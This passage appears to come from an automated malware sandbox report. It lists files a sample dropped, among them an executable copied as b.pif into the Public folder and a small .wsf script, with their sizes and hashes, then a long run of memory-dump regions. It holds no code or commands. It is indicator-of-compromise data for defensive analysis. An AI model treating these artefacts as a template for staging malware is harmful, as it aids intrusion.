96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\golden.pdf
Filesize
8KB

MD5
378fe7a687ddbb83fc6257d5abd0bcce

SHA1
9438f017e18e0092012d6c8b4089286b53c56483

SHA256
27b736dfb1dbb0814a788e2357c42338c178c740441aec4d2af32c86a638f89f

SHA512
8af7c6f8dbcdba71b962804918bf1be31ad51b164e2d040226e5004f8b67efccd53472339ab62c73cfe0a38a3b4c6ed156ec013c679c42988353823eae83caea

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmp9C40.tmp
Filesize
1KB

MD5
70641d9032c889bbeafb861d2c710bd3

SHA1
ca6ce7f6afabde7ee7e73d24b81dea3031d5ecb3

SHA256
23e0904f8cb7968abf87568c3b1458c9301476612ee237175efda2979db82854

SHA512
553f24c28fd03a61934b40d82c8d11cd53a33cc6188ca154215fe95125770cd3c9d8afd60c1c607fe1244ffd7e5a372629b31ec0bde54c8840651ca7576592b0

Download Submit
C:\Users\Admin\AppData\Roaming\YbBJEfC.exe
Filesize
771KB

MD5
424811420bb77c6b2aeee8fd5fd651e0

SHA1
091e39b1bc3d0f32d39bea4563c6fb4dce55bd8c

SHA256
22d6a6eb47dda91310bfe3726acca1576b1b4023bb9a8f3d79ac1c6fc9da12d2

SHA512
3b4b24ba7a56654aa47d8cb12c8b7cbe9ecb2fccb33754890e9114b2716e3c12a18fe79f99b87515347167625ce93b6dcfe69a349c5dc2ae4ef2aa1aede54efb

Download Submit
C:\Users\Public\b.pif
Filesize
771KB

MD5
424811420bb77c6b2aeee8fd5fd651e0

SHA1
091e39b1bc3d0f32d39bea4563c6fb4dce55bd8c

SHA256
22d6a6eb47dda91310bfe3726acca1576b1b4023bb9a8f3d79ac1c6fc9da12d2

SHA512
3b4b24ba7a56654aa47d8cb12c8b7cbe9ecb2fccb33754890e9114b2716e3c12a18fe79f99b87515347167625ce93b6dcfe69a349c5dc2ae4ef2aa1aede54efb

Download Submit
C:\Users\Public\b.pif
Filesize
771KB

MD5
424811420bb77c6b2aeee8fd5fd651e0

SHA1
091e39b1bc3d0f32d39bea4563c6fb4dce55bd8c

SHA256
22d6a6eb47dda91310bfe3726acca1576b1b4023bb9a8f3d79ac1c6fc9da12d2

SHA512
3b4b24ba7a56654aa47d8cb12c8b7cbe9ecb2fccb33754890e9114b2716e3c12a18fe79f99b87515347167625ce93b6dcfe69a349c5dc2ae4ef2aa1aede54efb

Download Submit
C:\Users\Public\textfile.wsf
Filesize
86B

MD5
2955b01463b39ba248cb5b4fbfd8e9ba

SHA1
c344f249d03b7e71caecfd77377fb159df195b02

SHA256
1995096acdc328fc0af410df38db69ce77f3e0598cfdb8c03561db229f21e797

SHA512
007313112bd9a32b7dea45221c8d7dc2d253e6f543d8518062e41bd403fe67d286aa44db3b6027cdfcefb8e2428e14402e20071fb60ffd09a638894bb4edd8a7

Download Submit
memory/940-234-0x0000000000400000-0x0000000000426000-memory.dmp

Filesize
152KB

Download
memory/2760-268-0x0000000007D60000-0x0000000007DF6000-memory.dmp

Filesize
600KB

Download
memory/2760-237-0x0000000006050000-0x00000000060B6000-memory.dmp

Filesize
408KB

Download
memory/2760-252-0x00000000077A0000-0x00000000077D2000-memory.dmp

Filesize
200KB

Download
memory/2760-251-0x0000000005370000-0x0000000005380000-memory.dmp

Filesize
64KB

Download
memory/2760-250-0x00000000067E0000-0x00000000067FE000-memory.dmp

Filesize
120KB

Download
memory/2760-263-0x0000000006DA0000-0x0000000006DBE000-memory.dmp

Filesize
120KB

Download
memory/2760-239-0x0000000006130000-0x0000000006196000-memory.dmp

Filesize
408KB

Download
memory/2760-265-0x0000000007AE0000-0x0000000007AFA000-memory.dmp

Filesize
104KB

Download
memory/2760-236-0x0000000005980000-0x00000000059A2000-memory.dmp

Filesize
136KB

Download
memory/2760-253-0x00000000707F0000-0x000000007083C000-memory.dmp

Filesize
304KB

Download
memory/2760-232-0x0000000005370000-0x0000000005380000-memory.dmp

Filesize
64KB

Download
memory/2760-266-0x000000007F1B0000-0x000000007F1C0000-memory.dmp

Filesize
64KB

Download
memory/2760-233-0x00000000059B0000-0x0000000005FD8000-memory.dmp

Filesize
6.2MB

Download
memory/2760-231-0x0000000005370000-0x0000000005380000-memory.dmp

Filesize
64KB

Download
memory/2760-264-0x0000000008130000-0x00000000087AA000-memory.dmp

Filesize
6.5MB

Download
memory/2760-229-0x0000000002E20000-0x0000000002E56000-memory.dmp

Filesize
216KB

Download
memory/2760-267-0x0000000007B50000-0x0000000007B5A000-memory.dmp

Filesize
40KB

Download
memory/2760-280-0x0000000007D10000-0x0000000007D1E000-memory.dmp

Filesize
56KB

Download
memory/2760-284-0x0000000007E20000-0x0000000007E3A000-memory.dmp

Filesize
104KB

Download
memory/2760-285-0x0000000007E00000-0x0000000007E08000-memory.dmp

Filesize
32KB

Download
memory/4872-164-0x000001FEFE6F0000-0x000001FEFE700000-memory.dmp

Filesize
64KB

Download
memory/4872-133-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

Filesize
64KB

Download
memory/4872-428-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

Filesize
64KB

Download
memory/4872-425-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

Filesize
64KB

Download
memory/4872-198-0x000001FE8FDF0000-0x000001FE8FFF0000-memory.dmp

Filesize
2.0MB

Download
memory/4872-426-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

Filesize
64KB

Download
memory/4872-427-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

Filesize
64KB

Download
memory/4872-135-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

Filesize
64KB

Download
memory/4872-406-0x000001FF00100000-0x000001FF001FC000-memory.dmp

Filesize
1008KB

Download
memory/4872-405-0x000001FE8C9A0000-0x000001FE8CEC8000-memory.dmp

Filesize
5.2MB

Download
memory/4872-213-0x000001FEA9840000-0x000001FEA9850000-memory.dmp

Filesize
64KB

Download
memory/4872-214-0x000001FEA9840000-0x000001FEA9850000-memory.dmp

Filesize
64KB

Download
memory/4872-215-0x000001FEA9840000-0x000001FEA9850000-memory.dmp

Filesize
64KB

Download
memory/4872-216-0x000001FEA9840000-0x000001FEA9850000-memory.dmp

Filesize
64KB

Download
memory/4872-217-0x000001FE8FDF0000-0x000001FE8FFF0000-memory.dmp

Filesize
2.0MB

Download
memory/4872-134-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

Filesize
64KB

Download
memory/4872-136-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

Filesize
64KB

Download
memory/4872-137-0x00007FFAE6A50000-0x00007FFAE6A60000-memory.dmp

Filesize
64KB

Download
memory/4872-174-0x000001FEA9840000-0x000001FEA9850000-memory.dmp

Filesize
64KB

Download
memory/4872-173-0x000001FEA9840000-0x000001FEA9850000-memory.dmp

Filesize
64KB

Download
memory/4872-169-0x000001FEA9840000-0x000001FEA9850000-memory.dmp

Filesize
64KB

Download
memory/4872-168-0x000001FEA9840000-0x000001FEA9850000-memory.dmp

Filesize
64KB

Download
memory/4872-167-0x000001FEA9840000-0x000001FEA9850000-memory.dmp

Filesize
64KB

Download
memory/4872-166-0x000001FEA9750000-0x000001FEA97AA000-memory.dmp

Filesize
360KB

Download
memory/4872-165-0x000001FEFE720000-0x000001FEFE738000-memory.dmp

Filesize
96KB

Download
memory/4872-138-0x00007FFAE4720000-0x00007FFAE4730000-memory.dmp

Filesize
64KB

Download
memory/4872-163-0x000001FEFFF90000-0x000001FEFFFE0000-memory.dmp

Filesize
320KB

Download
memory/4872-162-0x000001FEFFF60000-0x000001FEFFF88000-memory.dmp

Filesize
160KB

Download
memory/4872-161-0x000001FF097E0000-0x000001FF0DAF6000-memory.dmp

Filesize
67.1MB

Download
memory/4872-157-0x000001FEFEBF0000-0x000001FEFEC12000-memory.dmp

Filesize
136KB

Download
memory/4872-156-0x000001FEFE6B0000-0x000001FEFE6BA000-memory.dmp

Filesize
40KB

Download
memory/4872-155-0x000001FEFE6A0000-0x000001FEFE6B0000-memory.dmp

Filesize
64KB

Download
memory/4872-154-0x000001FF014A0000-0x000001FF02230000-memory.dmp

Filesize
13.6MB

Download
memory/4872-153-0x000001FEFE6C0000-0x000001FEFE6E2000-memory.dmp

Filesize
136KB

Download
memory/4872-152-0x000001FF00540000-0x000001FF00702000-memory.dmp

Filesize
1.8MB

Download
memory/4872-151-0x000001FEFEB90000-0x000001FEFEBEC000-memory.dmp

Filesize
368KB

Download
memory/4872-150-0x000001FF002A0000-0x000001FF00534000-memory.dmp

Filesize
2.6MB

Download
memory/4872-149-0x000001FF02A60000-0x000001FF054C0000-memory.dmp

Filesize
42.4MB

Download
memory/4872-144-0x000001FEA9840000-0x000001FEA9850000-memory.dmp

Filesize
64KB

Download
memory/4872-143-0x000001FEA9A00000-0x000001FEA9BA2000-memory.dmp

Filesize
1.6MB

Download
memory/4872-139-0x00007FFAE4720000-0x00007FFAE4730000-memory.dmp

Filesize
64KB

Download
memory/4888-199-0x000001E2F63A0000-0x000001E2F63B0000-memory.dmp

Filesize
64KB

Download
memory/4888-188-0x000001E2F5E00000-0x000001E2F5E22000-memory.dmp

Filesize
136KB

Download
memory/4888-200-0x000001E2F63A0000-0x000001E2F63B0000-memory.dmp

Filesize
64KB

Download
memory/4888-201-0x000001E2F63A0000-0x000001E2F63B0000-memory.dmp

Filesize
64KB

Download
memory/4908-222-0x0000000006730000-0x00000000067CC000-memory.dmp

Filesize
624KB

Download
memory/4908-220-0x0000000004A60000-0x0000000004A70000-memory.dmp

Filesize
64KB

Download
memory/4908-212-0x0000000004CD0000-0x0000000004CDA000-memory.dmp

Filesize
40KB

Download
memory/4908-211-0x0000000004A60000-0x0000000004A70000-memory.dmp

Filesize
64KB

Download
memory/4908-210-0x0000000004AA0000-0x0000000004B32000-memory.dmp

Filesize
584KB

Download
memory/4908-209-0x0000000004F70000-0x0000000005514000-memory.dmp

Filesize
5.6MB

Download
memory/4908-208-0x0000000000010000-0x00000000000D8000-memory.dmp

Filesize
800KB

Download